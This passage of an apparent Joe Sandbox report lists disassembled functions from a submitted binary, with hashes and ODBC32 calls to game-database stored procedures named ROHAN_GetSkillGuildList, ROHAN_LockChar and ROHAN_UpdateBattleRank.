                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DeleteKill] (?, ?, ?)}
                                                                                      • API String ID: 0-3429767106
                                                                                      • Opcode ID: e658a7d8f822bcc1b4acfc12eac7a0a07e7659166ba6e5370ce6764a412b591c
                                                                                      • Instruction ID: 653344c3325d1753175d7e9282ec8e83b19937b7d3d53aa576d5ad0b3b01fbaf
                                                                                      • Opcode Fuzzy Hash: e658a7d8f822bcc1b4acfc12eac7a0a07e7659166ba6e5370ce6764a412b591c
                                                                                      • Instruction Fuzzy Hash: 113103F1644214BBEB208F44CC42FA97376EBC4B24F21C385F6186F2C5D9B269608F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetSuitablePlayerForPost](?, ?, ?)},000000FD), ref: 0043F882
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043F8C1
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F8F6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0043F92E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F966
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetSuitablePlayerForPost](?, ?, ?)}, xrefs: 0043F879
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetSuitablePlayerForPost](?, ?, ?)}
                                                                                      • API String ID: 0-258379439
                                                                                      • Opcode ID: ff12e426d00d5b55a864bfa0921e4eeb7622400d33d8e7c86da800f333a9b4f3
                                                                                      • Instruction ID: b63aae5c9d1994f4239571223b6e149546b3761beafabfc83bc84c9e591b3271
                                                                                      • Opcode Fuzzy Hash: ff12e426d00d5b55a864bfa0921e4eeb7622400d33d8e7c86da800f333a9b4f3
                                                                                      • Instruction Fuzzy Hash: 6331C2B1680218BBEB28DFD4CC52FE973B5EB44B18F104189FB146E2C5D5B56E808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetSkillGuildList] (?, ?, ?)},000000FD), ref: 0042E8F5
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E934
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E969
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E9A1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042E9D9
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetSkillGuildList] (?, ?, ?)}, xrefs: 0042E8EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetSkillGuildList] (?, ?, ?)}
                                                                                      • API String ID: 0-1428927117
                                                                                      • Opcode ID: 7f51666502635130732ff2366e3ae97eb7768ae2d5d6700cab423cfb0a302101
                                                                                      • Instruction ID: acca403623710d732d4c78ad32cb23a299b5098e33e14408e80b211e4c7b4b78
                                                                                      • Opcode Fuzzy Hash: 7f51666502635130732ff2366e3ae97eb7768ae2d5d6700cab423cfb0a302101
                                                                                      • Instruction Fuzzy Hash: 9F31E3B5A802187BEB248F54CC56FAA7376EBC4B24F108389F6146F2C1D6B669508F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetRecentCharID](?,?,?)},000000FD), ref: 00436A33
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00436A72
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436AA7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436ADF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00436B17
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetRecentCharID](?,?,?)}, xrefs: 00436A2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetRecentCharID](?,?,?)}
                                                                                      • API String ID: 0-3331057167
                                                                                      • Opcode ID: 542a91e7d3d88eaff5454a5ae24dd68dab81783df7b12c04dcfb68738b75a630
                                                                                      • Instruction ID: 64b3fcdbf73da64d0f6ac08d6d88282dcee068bfdfc4eeaaec5bffa64f94991f
                                                                                      • Opcode Fuzzy Hash: 542a91e7d3d88eaff5454a5ae24dd68dab81783df7b12c04dcfb68738b75a630
                                                                                      • Instruction Fuzzy Hash: 1A31F1B56446587BFB218B48CC42F9A7374EB84B19F208385F7147E2C4DDB179C08B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_LockChar](?,?,?)} ,000000FD), ref: 004380FA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043813C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00438174
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004381AC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004381E4
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_LockChar](?,?,?)} , xrefs: 004380F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_LockChar](?,?,?)}
                                                                                      • API String ID: 0-3816596972
                                                                                      • Opcode ID: 829549942554a6f08dddbf27838ae57beedcf09b8672779d4f980731cedc5ac8
                                                                                      • Instruction ID: 78aa28172b8a0b79ae199d7b3e493825f72f1a555ced8e609503c2670bf2adcd
                                                                                      • Opcode Fuzzy Hash: 829549942554a6f08dddbf27838ae57beedcf09b8672779d4f980731cedc5ac8
                                                                                      • Instruction Fuzzy Hash: A13103B5644214BBEB24CB84CD52FA97334EF80B18F20828AF72D6F2C5D5B57D408B68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdateBattleRank] (?,?,?) },000000FD), ref: 0043955A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043959C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004395D1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00439609
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00439641
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdateBattleRank] (?,?,?) }, xrefs: 00439551
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdateBattleRank] (?,?,?) }
                                                                                      • API String ID: 0-3008649502
                                                                                      • Opcode ID: 62fd64a8b2bd06745289ea50189d185d8f4da7d2e62ad2369bf354d0cac2a992
                                                                                      • Instruction ID: d19eabc5d2a0bd348f2ee54208843ce82d78d074d965952311208f483da12d10
                                                                                      • Opcode Fuzzy Hash: 62fd64a8b2bd06745289ea50189d185d8f4da7d2e62ad2369bf354d0cac2a992
                                                                                      • Instruction Fuzzy Hash: 0E3125B0754218BBEB608B84CC52FAA7334EB41B24F20828BF6556E2C5D6B17D408F69
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_AddCurrentBattlePoint] (?,?,?) },000000FD), ref: 0043965F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004396A1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004396D6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043970E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00439746
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddCurrentBattlePoint] (?,?,?) }, xrefs: 00439656
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
